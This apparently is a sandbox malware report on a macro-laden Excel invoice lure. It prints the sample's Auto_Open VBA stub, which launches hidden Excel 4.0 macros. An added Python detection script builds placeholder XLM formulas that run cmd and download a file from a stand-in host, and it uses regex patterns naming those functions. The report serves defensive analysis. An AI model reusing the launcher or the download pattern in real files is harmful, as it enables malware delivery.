Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T04:02:31">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\195EC58F.jpg
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
Category: dropped
Size (bytes): 92379
Entropy (8bit): 7.654577060340879
Encrypted: false
SSDEEP: 1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
MD5: 4A425E6A5A885C0D0E2589506FD2244B
SHA1: E23482422480A4720E22F311B42BD65E2F3556F8
SHA-256: 76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
SHA-512: 3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                                    Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
C:\Users\user\AppData\Local\Temp\EE720000
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 117957
Entropy (8bit): 7.69158533653563
Encrypted: false
SSDEEP: 3072:A5a7PmbCvKINbjvw548LMb/oqKO8NnS8+60KcL:A5ayDAbT648LM7D98Np+Ew
MD5: 7446C62B26F3B52F6D9A984F6771968A
SHA1: 97910D27E2CEADD2A2F09849062422D46BAAAF59
SHA-256: E0DD16FE1A4B568218CDF8A3C71A3C8F245438C10D4EF67B271A81E77ABEDBE9
SHA-512: B624FDF79730FEBE42FC013D71B59244F01625FBB3CE30236AC478B4CA895AD05C987F59B5D570F62AF13AAE151A2D1AAE993DDC87DDB8512D926487029FF0E4
Malicious: false
Reputation: low
                                                                                                                                                    Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\9177284661-04302021.LNK
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:27:01 2020, mtime=Tue May 4 12:02:35 2021, atime=Tue May 4 12:02:35 2021, length=117952, window=hide
Category: dropped
Size (bytes): 2236
Entropy (8bit): 4.673524035961049
Encrypted: false
SSDEEP: 24:8ZbmtQAF8jHCD+HJ77aB6myZbmtQAF8jHCD+HJ77aB6m:8ZbmNFYJiB6pZbmNFYJiB6
MD5: 74FA1AA7539C02D950B137C7AFE2009D
SHA1: A3B3FA965CFDD06B6D73D738EAD4DBA41302C1B9
SHA-256: 76B0DE305D3C914A064AFFB3FF85CB9C30646BAB8A5E673B441CB7295103BC4D
SHA-512: F9A5A1C378E0DD991A8F1D20AD149D022CE094968E0EBB8F19A748D394CF56EA911A703F810B422311CFE08EFDE29177B824CAFBAC3DFA57DAB971542B00851F
Malicious: false
Reputation: low
                                                                                                                                                    Preview: L..................F.... ....0.$>...B....@..B....@...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...RFh....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qb{..user..B.......N...RFh.....S.....................7v.e.n.g.i.n.e.e.r.....~.1.....>Qc{..Desktop.h.......N...RFh.....Y..............>......'.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2......RLh .917728~1.XLS..b......>Qa{.RLh.....R....................IP..9.1.7.7.2.8.4.6.6.1.-.0.4.3.0.2.0.2.1...x.l.s.m.......a...............-.......`...........>.S......C:\Users\user\Desktop\9177284661-04302021.xlsm../.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.9.1.7.7.2.8.4.6.6.1.-.0.4.3.0.2.0.2.1...x.l.s.m.........:..,.LB.)...A}...`.......X.......325494...........!a..%.H.VZAj...O...1........-$..!a..%.H.VZAj...O...1........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 18:52:18 2019, mtime=Tue May 4 12:02:35 2021, atime=Tue May 4 12:02:35 2021, length=12288, window=hide
Category: dropped
Size (bytes): 917
Entropy (8bit): 4.657023284259249
Encrypted: false
SSDEEP: 12:8uU+20U+WCHo6I2y3w8+WMjA+N/E2ybD83/IeYIe8k44t2Y+xIBjKZm:8Vjw1AS8HD+J7aB6m
MD5: 660D3DA6BBCC8E29D7C27D3148A431AA
SHA1: 7020B2870451FD670EB2BA4432DDA87ABC70B040
SHA-256: E8997C8AAA499DCFD8DDD8FB34A576568E698A3535AF2D52442C332FA63929BC
SHA-512: 472BDF2E41CA45F56503686718E4D10C36D2DCB1C184C0DD9167C9E1711475D4124F79EB2D2E248504145BBA35CE8E85149423024D1EA5B1F3C7E42F1FAD7AF6
Malicious: false
Reputation: low
                                                                                                                                                    Preview: L..................F..........h.!-...?...@..>{...@...0...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...RFh....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qb{..user..B.......N...RFh.....S.....................7v.e.n.g.i.n.e.e.r.....~.1......RRh..Desktop.h.......N...RRh.....Y..............>.....%.O.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......H...............-.......G...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A}...`.......X.......325494...........!a..%.H.VZAj...,,/..........-$..!a..%.H.VZAj...,,/..........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 123
Entropy (8bit): 4.686205681789939
Encrypted: false
SSDEEP: 3:bDesBVomxW7SNRfRg9rlNRfRg9rlmxW7SNRfRg9rlv:bSsjQc2pZ2pZc2p1
MD5: 871B42915595DE2EBB2F446CD7EAA5AE
SHA1: A7825CBFA29A607B1EC703FE705D405E0D259A1A
SHA-256: B7F9561E39BC18C1D2843A95701D3E2654EBB52EE5BF5B8A4FFCFE941CC71DC9
SHA-512: 9BC17D4439644B01529DF2B3AB0F335C38B626CBB51AD2D086ED03FF01DCA18E2CF35DB8B39638FB8383AE6D300C773999B99BE4D8883770123041E3D193DAF9
Malicious: false
Reputation: low
Preview: [folders]..Desktop.LNK=0..[misc]..9177284661-04302021.LNK=0..9177284661-04302021.LNK=0..[misc]..9177284661-04302021.LNK=0..
                                                                                                                                                    C:\Users\user\Desktop\D1820000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):117952
                                                                                                                                                    Entropy (8bit):7.691007150042473
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:X5a6vKINbjvw548LMb/oqKO8NnS8+60Kcj:X5arAbT648LM7D98Np+Ec
                                                                                                                                                    MD5:0A4A383CD1D7C4DA7A74098AFE637C89
                                                                                                                                                    SHA1:C9E1F6F6C33144EC690A465F0BF98F4275B5A608
                                                                                                                                                    SHA-256:FC2058C473E2551E8D03AEFA74F9C21914F64700AC377EC00831AEA96351290B
                                                                                                                                                    SHA-512:5CDE5BC046D9142878D3DF6421FB9FFC3956814E6C643EEC61957978B1FBB27579C2CD62E85CA0464140D1DFEBE67A111EA3AA072610CB52233D24F96EB7B07B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\Desktop\~$9177284661-04302021.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):330
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                    MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                    SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                    SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                    SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.679226664040162
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                    • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                    File name:9177284661-04302021.xlsm
                                                                                                                                                    File size:114788
                                                                                                                                                    MD5:a8b4e37766d35b543884d8882147eaa2
                                                                                                                                                    SHA1:4356c14118ea9098dabb6d9af620003b7929058a
                                                                                                                                                    SHA256:533c8713c4e10c223a9f8139f9d408ca326aee14a1d88382c91f2ff18cf0f93c
                                                                                                                                                    SHA512:581ee69b843a7657677e1f6b74147f273f340474ff36de56b1d579d0364ccc6c27c2f9dedf4d855bc2841351957a3620dc0327153ff4ff3dc87a2c6ad7eb8a6f
                                                                                                                                                    SSDEEP:3072:K6vKINbjvw548LMb/oqKO8NnS8+60Kcxtc:6AbT648LM7D98Np+Et
                                                                                                                                                    File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "/opt/package/joesandbox/database/analysis/403443/sample/9177284661-04302021.xlsm"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:False
                                                                                                                                                    Application Name:unknown
                                                                                                                                                    Encrypted Document:False
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:True

                                                                                                                                                    Summary

                                                                                                                                                    Author:Rabota
                                                                                                                                                    Last Saved By:Noped
                                                                                                                                                    Create Time:2015-06-05T18:19:34Z
                                                                                                                                                    Last Saved Time:2021-04-30T08:26:34Z
                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                    Security:0

                                                                                                                                                    Document Summary

                                                                                                                                                    Thumbnail Scaling Desired:false
                                                                                                                                                    Company:
                                                                                                                                                    Contains Dirty Links:false
                                                                                                                                                    Shared Document:false
                                                                                                                                                    Changed Hyperlinks:false
                                                                                                                                                    Application Version:16.0300

                                                                                                                                                    Streams with VBA

                                                                                                                                                    VBA File Name: Byutut.bas, Stream Size: 1343
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/Byutut
                                                                                                                                                    VBA File Name:Byutut.bas
                                                                                                                                                    Stream Size:1343
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 b0 04 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                    VBA Code Keywords

                                                                                                                                                    Keyword
                                                                                                                                                    Function
                                                                                                                                                    Application.Run
                                                                                                                                                    Attribute
                                                                                                                                                    Auto_Open()
                                                                                                                                                    VB_Name
                                                                                                                                                    "Byutut"
                                                                                                                                                    Public
                                                                                                                                                    VBA Code
Attribute VB_Name = "Byutut"

' Auto_Open is a reserved procedure name: Excel runs it as soon as the workbook is
' opened with macros enabled, with no further user interaction.
Public Function Auto_Open()

' Application.Run with a Range argument executes the Excel 4.0 (XLM) macro that
' starts in that cell. This module is therefore only a launcher; the payload logic
' lives in the macro sheet "Nyukasl", not in VBA.
Application.Run Sheets("Nyukasl").Range("AM5")

Application.Run Sheets("Nyukasl").Range("A5")
Application.Run Sheets("Nyukasl").Range("A5")

End Function
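The Byutut module is only a bridge: Auto_Open fires on open, and Application.Run with a Range argument hands control to the Excel 4.0 (XLM) macro starting at that cell, so the real logic sits in the macro sheet "Nyukasl". The script below is an added example, not part of this report or of the sample: it builds a constructed minimal .xlsm in memory (it reuses only the sheet name and the cell addresses AM5/A5 from the VBA stub; the formulas and the example.invalid URL are placeholders, not the sample's content) and shows the static checks behind a "hidden Excel 4.0 macro" finding: macro-sheet parts identified by their content type in [Content_Types].xml, hidden/veryHidden sheets in workbook.xml, and XLM formulas that reach the OS (EXEC, CALL, REGISTER, the URLDownloadToFile API). The verdict function is a rough approximation of such a signature, not the sandbox's actual rule.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Content type that marks an OOXML part as an Excel 4.0 macro sheet (XLM),
# as opposed to an ordinary worksheet part.
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet+xml"

# XLM functions that run external code, and Win32 APIs typically reached through
# CALL/REGISTER. Illustrative lists, not exhaustive.
FUNC_RE = re.compile(r"\b(EXEC|CALL|REGISTER|FORMULA|RUN)\s*\(", re.I)
API_RE = re.compile(r"URLDownloadToFile|ShellExecute|WinExec|CreateProcess", re.I)


def build_sample_xlsm() -> bytes:
    """Constructed minimal .xlsm (NOT the analysed sample): one visible worksheet and a
    veryHidden macro sheet named like the one the VBA stub targets. Formulas are placeholders."""
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/xl/workbook.xml" '
        'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
        '<Override PartName="/xl/worksheets/sheet1.xml" '
        'ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>'
        f'<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="{MACROSHEET_CT}"/>'
        '</Types>'
    )
    workbook = (
        '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
        '<sheet name="Nyukasl" sheetId="2" state="veryHidden" r:id="rId2"/></sheets>'
        '</workbook>'
    )
    worksheet = (
        '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        '<sheetData><row r="1"><c r="A1" t="str"><v>Invoice</v></c></row></sheetData></worksheet>'
    )
    macrosheet = (  # placeholder formulas; OOXML stores formulas without the leading "="
        '<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">'
        '<sheetData><row r="5">'
        '<c r="A5"><f>EXEC("cmd /c echo constructed-sample")</f></c>'
        '<c r="B5" t="str"><v>label only, no formula</v></c>'
        '<c r="AM5"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
        '"http://example.invalid/payload.dat","C:\\Users\\Public\\payload.dat",0,0)</f></c>'
        '</row></sheetData></xm:macrosheet>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/worksheets/sheet1.xml", worksheet)
        z.writestr("xl/macrosheets/sheet1.xml", macrosheet)
    return buf.getvalue()


def _local(tag: str) -> str:
    """Strip the XML namespace from an ElementTree tag."""
    return tag.rsplit("}", 1)[-1]


def analyse_xlsm(data: bytes) -> dict:
    """Return macro-sheet parts, hidden sheets and suspicious XLM formulas found in an .xlsm."""
    z = zipfile.ZipFile(io.BytesIO(data))
    types = ET.fromstring(z.read("[Content_Types].xml"))
    macro_parts = [
        el.get("PartName").lstrip("/")
        for el in types.iter()
        if _local(el.tag) == "Override" and el.get("ContentType") == MACROSHEET_CT
    ]
    wb = ET.fromstring(z.read("xl/workbook.xml"))
    hidden = {
        el.get("name"): el.get("state")
        for el in wb.iter()
        if _local(el.tag) == "sheet" and el.get("state") in ("hidden", "veryHidden")
    }
    findings = []
    for part in macro_parts:
        for cell in ET.fromstring(z.read(part)).iter():
            if _local(cell.tag) != "c":
                continue
            formula = next((ch.text for ch in cell if _local(ch.tag) == "f"), None)
            if not formula:
                continue
            hits = {m.upper() for m in FUNC_RE.findall(formula)}
            hits |= {m.upper() for m in API_RE.findall(formula)}
            if hits:
                findings.append({"part": part, "cell": cell.get("r"),
                                 "hits": sorted(hits), "formula": formula})
    return {"macrosheets": macro_parts, "hidden_sheets": hidden, "findings": findings}


def verdict(report: dict) -> str:
    """Approximation of a 'hidden XLM' signature: OS-reaching formula on a macro sheet
    in a workbook that also hides sheets. Not the sandbox's actual rule."""
    if report["findings"] and report["hidden_sheets"]:
        return "hidden-xlm-suspicious"
    if report["macrosheets"]:
        return "xlm-present"
    return "no-xlm"


if __name__ == "__main__":
    rep = analyse_xlsm(build_sample_xlsm())
    print(verdict(rep))
    for f in rep["findings"]:
        print(f"{f['part']} {f['cell']}: {f['hits']} :: {f['formula']}")
```

On a real file, pass the bytes of the .xlsm to analyse_xlsm; tools such as olevba or oledump then dump the VBA stub and the full sheet formulas. Excel 4.0 macro sheets inside legacy BIFF .xls files are not ZIP parts and need a BIFF record parser instead.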
                                                                                                                                                    VBA File Name: Class1.cls, Stream Size: 999
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/Class1
                                                                                                                                                    VBA File Name:Class1.cls
                                                                                                                                                    Stream Size:999
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                    VBA Code Keywords

                                                                                                                                                    Keyword
                                                                                                                                                    False
                                                                                                                                                    VB_Exposed
                                                                                                                                                    Attribute
                                                                                                                                                    VB_Name
                                                                                                                                                    VB_Creatable
                                                                                                                                                    VB_PredeclaredId
                                                                                                                                                    VB_GlobalNameSpace
                                                                                                                                                    VB_Base
                                                                                                                                                    VB_Customizable
                                                                                                                                                    VB_TemplateDerived
                                                                                                                                                    VBA Code
                                                                                                                                                    Attribute VB_Name = "Class1"
                                                                                                                                                    Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                                    Attribute VB_PredeclaredId = False
                                                                                                                                                    Attribute VB_Exposed = False
                                                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                                                    Attribute VB_Customizable = False

                                                                                                                                                    Streams

                                                                                                                                                    Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 543
                                                                                                                                                    General
                                                                                                                                                    Stream Path:PROJECT
                                                                                                                                                    File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                    Stream Size:543
                                                                                                                                                    Entropy:5.37319650849
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:I D = " { 6 5 E C 9 F D C - 2 0 9 0 - 4 6 C 0 - 8 5 8 F - 4 1 2 6 6 D 3 E 0 1 6 B } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = . . . . 2 / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 9 0 B D 9 D F D D D F D D D F D D D F D D
                                                                                                                                                    Data Raw:49 44 3d 22 7b 36 35 45 43 39 46 44 43 2d 32 30 39 30 2d 34 36 43 30 2d 38 35 38 46 2d 34 31 32 36 36 44 33 45 30 31 36 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8
Stream Path: PROJECTwm, File Type: data, Stream Size: 107
Stream Path: PROJECTwm
File Type: data
Stream Size: 107
Entropy: 3.96151942936
Base64 Encoded: False
Data ASCII: . . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . B y u t u t . B . y . u . t . u . t . . . . . . . 2 . . . 8 . A . B . 2 . . . C l a s s 1 . C . l . a . s . s . 1 . . . . .
Data Raw: dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 cb e8 f1 f2 32 00 1b 04 38 04 41 04 42 04 32 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 00 00
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2831
Stream Path: VBA/_VBA_PROJECT
File Type: data
Stream Size: 2831
Entropy: 4.1308794712
Base64 Encoded: False
Data ASCII: . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw: cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1642
Stream Path: VBA/__SRP_0
File Type: data
Stream Size: 1642
Entropy: 3.30953727146
Base64 Encoded: False
Data ASCII: . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ ` . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . b . T Z . . F . v . V . e . . . . . . . . . . . . . . . . . . . . . . . . . .
